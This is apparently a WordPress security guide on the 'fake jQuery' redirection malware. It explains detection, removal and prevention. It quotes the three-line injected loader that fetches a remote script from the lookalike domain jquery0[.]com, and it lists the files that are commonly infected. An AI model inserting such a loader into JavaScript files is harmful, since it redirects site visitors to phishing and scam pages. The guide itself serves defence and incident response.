Fake jQuery redirection is a type of website malware where attackers inject a malicious script into your WordPress JavaScript files that silently redirects your site visitors to scam or phishing domains. The most widely seen variant uses the domain jquery0[.]com (not the legitimate jquery.com) to execute the redirect.
What Is the jQuery0.com Malware Injection?
Attackers who have gained unauthorised access to a WordPress site inject the following three-line script at the top of legitimate .js files:
var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);This script creates a new <script> tag pointing to the attacker’s domain, appends it to every page’s <head>, and then executes the remote script — which redirects visitors to fake giveaway pages, phishing sites, or malware download pages. The domain jquery0.com was chosen deliberately to resemble the official jquery.com and to avoid raising immediate suspicion in browser developer tools or server logs.
Which Files Are Commonly Infected?
The injection has been found in the following WordPress core, theme, and plugin files:
wp-includes/js/jquery/jquery.min.jswp-includes/js/jquery/ui/effect-transfer.min.jswp-includes/js/dist/vendor/wp-polyfill.min.jswp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.jswp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.jswp-content/plugins/LayerSlider/static/layerslider/js/greensock.jswp-content/plugins/gravityforms/js/gravityforms.min.jswp-content/plugins/popup-builder/public/js/PopupConfig.js
Any .js file in your WordPress installation could potentially be targeted. The injection is typically placed at the very top of the file to ensure it executes before any other script.
How to Detect the Fake jQuery Redirection on Your Site?
- Scan with a malware scanner — Use WordFence, Sucuri, or MalCare to scan all files for the
jquery0.comstring or the patterndocument.createElement('script')appearing at the top of .js files. - Manual file inspection — Connect via sFTP or cPanel File Manager, navigate to
wp-includes/js/jquery/, and openjquery.min.js. If the first lines contain unfamiliar variable declarations or externalsrcreferences, your site is infected. - Check browser console — Open your site in a browser, press F12 → Network tab, filter by JS files, and look for requests to domains other than your own or the expected CDNs.
- Google Safe Browsing check — Search
site:yourdomain.comin Google and check if any warnings appear, or use the Google Transparency Report to check your domain’s safety status.
How to Remove the jquery0.com Malware Injection?
Step 1: Take the Site Offline Temporarily
Enable maintenance mode to prevent more visitors being redirected to scam pages while you clean the site.
Step 2: Change All Passwords
Change your WordPress admin passwords, cPanel/hosting passwords, sFTP passwords, and database passwords immediately. The attackers may still have active credentials.
Step 3: Remove the Malicious Script from JS Files
Connect via sFTP or cPanel and search all .js files for the malicious three-line block shown above. Remove it from every file where it appears. Alternatively, reinstall WordPress core files from the official download to restore clean versions of all core .js files.
Step 4: Update All Plugins, Themes, and WordPress Core
The attackers likely exploited an outdated plugin or theme to gain access. Update everything to the latest version. If any plugin or theme is no longer maintained (no updates for 12+ months), replace it with an actively maintained alternative.
Step 5: Check for Backdoors
Attackers often leave a backdoor PHP file to regain access even after passwords are changed. Scan for suspicious PHP files — particularly in the wp-content/uploads/ directory (where PHP should not exist) and in plugin/theme directories.
Step 6: Implement a Web Application Firewall (WAF)
Install WordFence or Sucuri WAF to block future injection attempts, brute force logins, and malicious bot traffic. Also implement security headers to harden your site — see the guide on securing your website with an A+ security rating.
How to Prevent Future JavaScript Injection Attacks?
- Use a different strong password for each account: WordPress admin, sFTP, cPanel, and database.
- Enable two-factor authentication on your WordPress admin account.
- Keep all plugins, themes, and WordPress core updated at all times.
- Run scheduled malware scans weekly using WordFence, Sucuri, or MalCare.
- Monitor server access logs for unexpected file modification timestamps.
- Implement file integrity monitoring that alerts you when core files are modified.
How to Get Professional Help?
If your website has been compromised by fake jQuery redirection or any other malware injection, report it to CERT-In at cert-in.org.in. For immediate professional malware removal and a full security audit of your WordPress site, contact cyber expert Anuraag Singh and his team.
